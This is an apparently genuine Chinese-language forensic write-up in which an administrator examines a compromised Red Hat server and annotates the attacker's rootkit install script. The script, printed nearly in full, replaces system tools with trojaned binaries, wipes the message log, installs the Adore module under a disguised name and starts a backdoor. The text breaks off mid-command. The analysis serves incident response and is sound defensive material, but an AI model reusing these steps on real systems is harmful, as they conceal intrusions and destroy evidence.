我的一次入侵分析
本来也不知道自己的机器有人进来了,因为放在内部,能经过NAT进来的几乎是
不可能的,但无意登陆机器随便看看,发现有个glibc的动态库不见了,立刻到
message
那看看,什么都没有。FT,立刻启动备份机器,把硬盘拔出来,插到我的其他服务
器上检查。唉,果然。。。
[root@mail a]# la- la
bash: la-: command not found
[root@mail a]# ls -la
total 704
drwxr-xr-x 23 root root 4096 Feb 2 08:08 .
drwxr-xr-x 7 root root 4096 Feb 5 18:15 ..
drwxr-xr-x 2 root root 4096 Oct 27 1999 .automount
drwxr-xr-x 2 root root 4096 Nov 23 20:26 CVS
drwxr-xr-x 2 root root 4096 Feb 2 08:08 bin
drwxr-xr-x 2 root root 4096 Feb 3 17:55 boot
drwxr-xr-x 2 root root 4096 Nov 23 22:04 command
-rw------- 1 root root 241664 Jan 28 23:01 core
就是这里溢出啦,看来是FTP或者SSH的问题,内部实验机器,内部IP
就懒得升级,结果。。。等下再gdm你好了。
drwxr-xr-x 7 root root 36864 Feb 2 08:08 dev
-rw-r--r-- 1 root root 330646 Feb 2 08:08 eddyrk.tar.gz
真要命,直接放,搞不懂是高手失误还是只会用别人的程序。
drwxr-xr-x 38 root root 4096 Feb 4 23:23 etc
drwxr-xr-x 2 root root 4096 Nov 23 20:20 home
drwxr-xr-x 4 root root 4096 Nov 23 20:30 lib
drwxr-xr-x 2 root root 16384 Nov 23 20:20 lost+found
drwxr-xr-x 2 root root 4096 Oct 31 1999 misc
drwxr-xr-x 4 root root 4096 Nov 23 20:26 mnt
drwxr-xr-t 3 root root 4096 Nov 23 22:03 package
dr-xr-xr-x 2 root root 4096 Feb 7 1996 proc
drwxr-xr-x 2 qmails 507 4096 Dec 14 21:40 rk
就是这个rootkit!看来很多人用这个呢
drwxr-xr-x 6 root root 4096 Feb 2 23:46 root
drwxr-xr-x 3 root root 4096 Feb 2 08:08 sbin
看到这2个目录没有,已经给改动过了,不可信任。
drwxr-xr-x 2 root root 4096 Nov 23 21:40 service
drwxrwxrwt 3 root root 4096 Feb 4 23:01 tmp
drwxr-xr-x 16 root root 4096 Nov 23 20:29 usr
drwxr-xr-x 2 root root 4096 Nov 23 20:20 var
[root@mail a]# date
星期二 02 5 18:28:17 CST 2002
[root@mail rk]# cat install
#!/bin/sh
unset HISTFILE
STARTDIR=`pwd`
CARDLOG="/usr/lib/locale/ro_RO/uboot/card.log"
这个程序的作者真不是人,连别人的信用卡都偷!
SMP=`uname -a | grep smp | wc -l`
还真的没考虑过入侵需要考虑是否SMP呢
clear
echo "***** \dev\hda1`s aka Mithra`s rootkit *****"
echo "* greetz 2 bogonel and Amorph|s *"
echo "* This is the RedHat 7.0 build *"
echo "********************************************"
sleep 2
clear
echo "Please wait while Setup is preparing your directory ... "
sleep 5
clear
echo "Heh, sounds like f***in' Windoze, doesn't it ? :) "
sleep 2
clear
DIR="/usr/lib/locale/ro_RO/uboot"
mkdir -p $DIR
mkdir -p $DIR/etc
cp -f * $DIR/ /dev/null 少有的清空方式,这样就没办法追查INODE了。
cd $DIR
echo "Installing trojaned system files ..."
echo "[*] Process tools ..."
替换查看进程命令,FT
echo " |---ps"
chattr -aiu /bin/ps
./sz /bin/ps ps
mv -f ps /bin/ps
chattr +aiu /bin/ps
echo " | \\"
echo " | |-- done replacing ps "
sleep 1
echo " |---pstree"
chattr -aiu /usr/bin/pstree
./sz /usr/bin/pstree pstree
mv -f pstree /usr/bin/pstree
chattr +aiu /usr/bin/pstree
echo " | \\"
echo " | |-- done replacing pstree "
sleep 1
echo " |---top"
chattr -aiu /usr/bin/top
./sz /usr/bin/top top
mv -f top /usr/bin/top
chattr +aiu /usr/bin/top
echo " | \\"
echo " | |-- done replacing top "
echo " |----|"
sleep 5
echo "[*] Network tools ..."
替换网络命令,FT,毒
echo " |---netstat"
chattr -aiu /bin/netstat
./sz /bin/netstat netstat
mv -f netstat /bin/netstat
chattr +aiu /bin/netstat
echo " | \\"
echo " | |-- done replacing netstat "
sleep 1
echo " |---ifconfig"
chattr -aiu /sbin/ifconfig
./sz /sbin/ifconfig ifconfig
mv -f ifconfig /sbin/ifconfig
chattr +aiu /sbin/ifconfig
echo " | \\"
echo " | |-- done replacing ifconfig "
#echo " |---inetd"
贱啊,什么都换了
#chattr -aiu /usr/sbin/inetd
#./sz /usr/sbin/inetd inetd
#mv -f inetd /usr/sbin/inetd
#chattr +aiu /usr/sbin/inetd
#echo " | \\"
#echo " | |-- done replacing inetd "
sleep 1
echo " |---tcpd"
chattr -aiu /usr/sbin/tcpd
./sz /usr/sbin/tcpd tcpd
mv -f tcpd /usr/sbin/tcpd
chattr +aiu /usr/sbin/tcpd
echo " | \\"
echo " | |-- done replacing tcpd "
echo " |----|"
sleep 1
echo "[*] Filesystem tools ..."
换了查找命令
echo " |---find"
chattr -aiu /usr/bin/find
./sz /usr/bin/find find
mv -f find /usr/bin/find
chattr +aiu /usr/bin/find
echo " | \\"
echo " | |-- done replacing find "
sleep 1
echo " |---ls"
chattr -aiu /bin/ls
./sz /bin/ls ls
mv -f ls /bin/ls
chattr +aiu /bin/ls
echo " | \\"
echo " | |-- done replacing ls "
echo " |----|"
echo " |---dir"
chattr -aiu /usr/bin/dir
./sz /usr/bin/dir dir
mv -f dir /usr/bin/dir
chattr +aiu /usr/bin/dir
echo " | \\"
echo " | |-- done replacing dir "
echo " |----|"
sleep 1
echo "[*] System tools ..."
echo " |---syslogd"
chattr -aiu /sbin/syslogd
./sz /sbin/syslogd syslogd
mv -f syslogd /sbin/syslogd
chattr +aiu /sbin/syslogd
echo " | \\"
echo " | |-- done replacing syslog "
echo " |----|"
删除所有log文件,不过这里写得不好。
用不删除,清内容更好。
rm -f /var/log/messages
touch /var/log/messages
/etc/rc.d/init.d/syslog restart
sleep 1
echo "[*] Placing configuration files in $DIR/etc/ ..."
mv -f netstatrc $DIR/etc/netstatrc
mv -f procrc $DIR/etc/procrc
mv -f filerc $DIR/etc/filerc
mv -f logrc $DIR/etc/logrc
sleep 1
开始编译外挂进程了,还好,不是LKM
echo "[*] Trying to install ADORE ..."
if [ -x /usr/bin/gcc ];
then
echo "GCC is present"
if [ -d /usr/src/linux ];
then
if [ $SMP -eq 0 ];
then
echo "We have a machine without SMP support"
cp -f Makefile.non-smp Makefile
else
echo "This machine supports SMP"
cp -f Makefile.smp Makefile
fi
make
mv -f ava /usr/bin/weather
还改头换面呢,呵呵~~
rm -f *.c *.h Makefile*
echo "ADORE is now installed ..."
else
echo "Kernel sources are not installed. Cannot install ADORE !"
fi
else
echo "GCC is not installed. Cannot install ADORE !"
fi
echo "[*] Replacing /etc/rc.d/init.d/network with ours ..."
mv -f network /etc/rc.d/init.d/network
sleep 5
mv -f twist2open /usr/bin/
echo "[*] Starting services ..."
#echo " |---backdoor ..."
#echo " |---sniffer ..."
加了后门还开SNIFFER,哼哼
#echo " |---bnc ..."
/usr/bin/twist2open &
echo " | \\"
echo " | |-- done"
echo " |----|"
rm -f ./*pid* /*pi
